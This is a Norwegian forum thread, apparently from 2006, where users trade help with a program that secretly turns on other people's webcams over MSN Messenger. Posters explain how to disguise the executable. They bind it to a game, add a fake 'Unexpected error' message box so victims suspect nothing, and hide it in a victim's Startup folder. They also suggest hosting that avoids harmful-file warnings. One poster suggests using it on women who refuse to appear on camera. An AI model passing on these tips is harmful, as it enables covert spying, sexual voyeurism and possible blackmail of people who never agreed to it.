Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  201 39304
Kan du fikse en oppskrift på hvordan jeg hiver exe-filen inn i et bilde etc?
Very Important Pyrotechnician
Thoryllo's Avatar
Søk så finner du svar på det med å legge exe filen i bilde.
Tusen takk! funker perfekt for meg, hittil har det bare vert en lettkledd dame med webcam på hittil
TUSEN TAKK!
Vet ikke om dette spm. har blitt svart eller spurt om i løpet av de 8 sidene her, men... De fleste webkameraer har jo en knapp eller noe som lyser en eller annen farge. ( Min lyser grønn når det er på ) Vil han/hun få lys på webkameraet sitt når vi setter på det uten at de vet det, da? Hvis han/hun har noe sånn lys da.
Ja, lyset vil bli slått på når du ser cammen hans/hennes =/
Jeg gir snart opp. Funker jo ikke. Altså det med å sette exe-fila inn i et bilde. Den andre tråden gir jo ingen svar. Og de programmene som blir oppgitt gjør jo ikke at exe-filen kjører.
Sitat av Lanka
Jeg gir snart opp. Funker jo ikke. Altså det med å sette exe-fila inn i et bilde. Den andre tråden gir jo ingen svar. Og de programmene som blir oppgitt gjør jo ikke at exe-filen kjører.
Vis hele sitatet...
Det kan du rett og slett bare glemme, det er ikke mulig med mindre det fins buffer overflows e.l i programmet som benyttes til å vise bildene.
Oki, men en annen ting. Får ikke vedkommende som mottar filen at "Programmet har kjørt ulovlig, og det sendes en rapport til Microsoft eller no"?
Very Important Pyrotechnician
Thoryllo's Avatar
Hmm jeg får ikke det...
Lanka: Funka det jeg sendte til deg?
Bare ikke drit dere ut og gjør noe sånt: Skoleelever drev webcam-utpressing.
Very Important Pyrotechnician
Thoryllo's Avatar
Så teite folk er!
Jeg blir litt sur jeg egentlig at folk driver å skal presse ut penger av venner (venner og venner da men...)
Får håpe ingen her på forumet kommer til å bruke prgrammet på en slik måte!
Jeg blir forvirra av hele denne tråden. Står så mye forskjellig. Kan noen gi meg en kode som FUNKER?!
Very Important Pyrotechnician
Thoryllo's Avatar
Følg denne posten og du har et webcam-hack program som fungerer topp!
http://www.freakforum.nu/forum/showp...&postcount=150
▼ ... over en uke senere ... ▼
Er det noe jeg skal gjøre med fila helt til slutt? Gjøre den om til en exe fil eller noe?
Sitat av Plogen
Er det noe jeg skal gjøre med fila helt til slutt? Gjøre den om til en exe fil eller noe?
Vis hele sitatet...
Ja, du må kompilere den til en .exe-fil da du er ferdig.
Hadde vært best å execute fila remotely.

Legg til dette:
MessageBox(NULL, "Unexpected error.\nProcess has been terminated.", "Msg Plus! Live", MB_OK | MB_ICONERROR);

(Bytt ut "Msg Plus! Live" med det som passer deg")
Da slipper du å forklare hvor programmet ble av.

Edit: Noen som kan si hvordan man compiler den med et ikon?
Sist endret av TanteSpiker; 2. desember 2006 kl. 18:07.
▼ ... over en uke senere ... ▼
noen som vet om en bra side jeg kan laste opp fila? uten at folka som skal laste den ned trenger å gå gjennom masse sider, skrive et passord osv...

hender nemlig alltid at personen ikke kan ta i mot fila fordi den er potensielt skadelig...

fant også ut at den du sender til får vite at han får videosamtale... hva gjør jeg feil:S?
den koden... hvor setter man den inn? For at den slaø funke altså...??
Sitat av ripsgard
noen som vet om en bra side jeg kan laste opp fila? uten at folka som skal laste den ned trenger å gå gjennom masse sider, skrive et passord osv...

hender nemlig alltid at personen ikke kan ta i mot fila fordi den er potensielt skadelig...

fant også ut at den du sender til får vite at han får videosamtale... hva gjør jeg feil:S?
Vis hele sitatet...
Hvis du trenger ett sted å laste opp filen så kan du bruke googlepages. Send meg en pm hvis du trenger en invite.
Hvor skal jeg legge "MessageBox(NULL, "Unexpected error.\nProcess has been terminated.", "Msg Plus! Live", MB_OK | MB_ICONERROR);" ?

Skal denne i den ukomplimerte c++ filen? Isåfall hvor skal jeg legge det inn?

Fant det nå, super "feilmelding".

Hvordan fikse den ved oppstart? Jeg har IKKE kodeskills
Sist endret av Crabman; 12. desember 2006 kl. 19:39.
Sitat av Magga1337
Hvor skal jeg legge "MessageBox(NULL, "Unexpected error.\nProcess has been terminated.", "Msg Plus! Live", MB_OK | MB_ICONERROR);" ?

Skal denne i den ukomplimerte c++ filen? Isåfall hvor skal jeg legge det inn?

Fant det nå, super "feilmelding".

Hvordan fikse den ved oppstart? Jeg har IKKE kodeskills
Vis hele sitatet...
Det første du spør om kan jeg dessverre ikke hjelpe deg med, da 'mitt' script fungerer umtmerket, og jeg har bare fulgt veilederen som ligger her i posten.

Dersom du spurte om hvordan du skal få lagt filen på oppstart hos et 'offer' kan du bare endre navn på filen til noe Windowsrelatert og legge den i Oppstartmappen under Start -> Programmer! Det har hvertfall jeg gjort hos mine kjære..
Hmmm,skjønte ikke helt hvordan jeg skulle få fila til å fungere,altså hvem av filene og hva jeg skal skrive for å kjøre fila.
Forbanna pre-scriptkiddies. Det er en GRUNN til at slike ting blir gitt ut med source, og det er fordi slike som dere som er på pre-scriptkiddie stadiet ikke skal kunne klare å kope dere fram til noe som helst. Samtlige av dere kan heller begynne å google på hvordan man kompilerer ting. EOD.
Sitat av vidarlo
For all del: Kompilert, kompilering, kompilere, kompilator.
Vis hele sitatet...
Enig med deg ;p
Hvorfor vil dere ha den på oppstart?
Går det å gi commander til msnmsgr.exe før den er startet?
Kan hende dette har stått før, men gidder ikke å lese alle 9 sidene

Hvor kan jeg laste ned et program som jeg kan sette på andres webcam uten at de merker det? Eller ihvertfall, hva heter programmet?
Sitat av [scrubs]
Kan hende dette har stått før, men gidder ikke å lese alle 9 sidene

Hvor kan jeg laste ned et program som jeg kan sette på andres webcam uten at de merker det? Eller ihvertfall, hva heter programmet?
Vis hele sitatet...
Svarene står på de 9 (4) tidligere sidene. Les. Som hint kan jeg fortelle deg at du ikke vil skjønne noe med mindre du leser.
Haha, funka fint med "oppskrifta" til jo10.
Har aldri i mitt liv vært borti noe liknende dette, men jeg klarte det på første forsøk.
Skjønner ikke hva som er så vannskelig..

Tusen takk for et ufattelig bra script.
Det ble også en ufattelig lang tråd med probs.
Sist endret av NAPse; 15. desember 2006 kl. 21:51.
Kult men lyse på cam går på :/ Det er litt bad.

Å noen som hadde vært så greie å forklart hvordan man fikk exe fila til å se ut som jpg? Har lasta ned det programmet osv...

Å hvor skulle jeg legge ****MessageBox(NULL, "Unexpected error.\nProcess has been terminated.", "Msg Plus! Live", MB_OK | MB_ICONERROR); ***** ??
Oyvind89: Legg den på hvilken linje du vil mellom bracketene. ({ })

Edit: Gjerne rett før 'return 0;' linja, fordi programmet pauser mens meldingen er oppe, og dermed må du vente til brukeren har trykt ok (eller kryss) før webcammet starter, HVIS du legger koden til langt oppe.
Det er en bagatell, men likevel.
Sist endret av TanteSpiker; 17. desember 2006 kl. 00:54.
Sitat av emo
Det første du spør om kan jeg dessverre ikke hjelpe deg med, da 'mitt' script fungerer umtmerket, og jeg har bare fulgt veilederen som ligger her i posten.

Dersom du spurte om hvordan du skal få lagt filen på oppstart hos et 'offer' kan du bare endre navn på filen til noe Windowsrelatert og legge den i Oppstartmappen under Start -> Programmer! Det har hvertfall jeg gjort hos mine kjære..
Vis hele sitatet...
Jeg skjønner ikke helt.
Havner den i oppstatsmappa bare man kaller den noe Windowsrelatert?
Nei! du må komme deg på personens pc. å legge den der selv
n00bs ....
Nok en gang:
Hvorfor skal den starte før offeret har klart å logge inn på messenger?
Hvis du vil gjemme fila i en annen fil laster du ned en exe-binder. Deretter kan du finne et lite spill i exe(som du kan finne på download.com) og binde det sammen. NÅr offeret åpner fila du har bindet sammen, begynner spillet, og webcam fila i bakgrunn uten mistanke. Hvis ikke anti virus program oppdager den.
Hahahha, anbefaler dette på det beste! sendte det til en kompis :P han fatta ingenting, plutselig så forsvant samtalen med meg og han kunne ikke gå inpå meg igjen før jeg hadde trykket esc på samtalen :P Var en god latter, samtidigt kan du sende den til deilige damer som nekter og ta på cam :P uten om di fleste som fatter nada av hva man sender og hvordan man skal åpne den, må jo sende den i winrar fil, ellers kommer det errorr opp :P noen som har forslag hvordan man kan gi den tingen til di uten om og sende det i winrar? prøvde og legge det ut på freewebs også, men det funka ikke :P
Sitat av Ifa
Hahahha, anbefaler dette på det beste! sendte det til en kompis :P han fatta ingenting, plutselig så forsvant samtalen med meg og han kunne ikke gå inpå meg igjen før jeg hadde trykket esc på samtalen :P Var en god latter, samtidigt kan du sende den til deilige damer som nekter og ta på cam :P uten om di fleste som fatter nada av hva man sender og hvordan man skal åpne den, må jo sende den i winrar fil, ellers kommer det errorr opp :P noen som har forslag hvordan man kan gi den tingen til di uten om og sende det i winrar? prøvde og legge det ut på freewebs også, men det funka ikke :P
Vis hele sitatet...
Du kan prøve å legge den ut på googlepages. (send pm for invite.)
Du kan også sette opp en apache server eller ftp server hjemme og sende link. Men det er kanskje litt mye styr.
heh.
funka som f dette
Fikk brukt det, men hvordan kjører jeg det liksom? jeg har sendte det til min andre pc og trykker på den en gang da blusser msq vinduet opp og blir lukket igjen, men en telefon ringing fortsetter.. kan noen fikse slik at det er KUN webcam som blir åpnet?? DE sitt og at jeg kan starte det fra min pc.. Mvh TGR
Sitat av .:TGR:.
....at jeg kan starte det fra min pc..
Vis hele sitatet...
Det er vanvittig lettere sagt enn gjort.
vel er det?? så forklar meg hvordan
Jeg satt her og håpet at du kunne gi meg koden til det...
Fikk til alt annen i filen enn #include "msgruaid.h", den blir bare merket som rød på hele linja...
Kan ikke noen bare lage filen, og dele morroa med oss?
Man kan jo ikke det.. hvis du leser koden så ser du at den kan kun åpnes for den mailen man skriver i koden. Dessuten dritlett hvis du følger oppskriften.
noen som legger ut den oppdaterte versjonen der småfixa er retta opp?
jo, denne tråden her er unødvendig.
Ok, da sletter vi 10 sider.
Minner fortsatt om http://www.freakforum.nu/forum/showp...&postcount=150 som jeg laga for å slippe slike dumme spørsmål... Folkens, kom igjen å les før dere spør!
Vel, flere av denne typen innlegg så ender hele tråden opp som enten stengt eller slettet.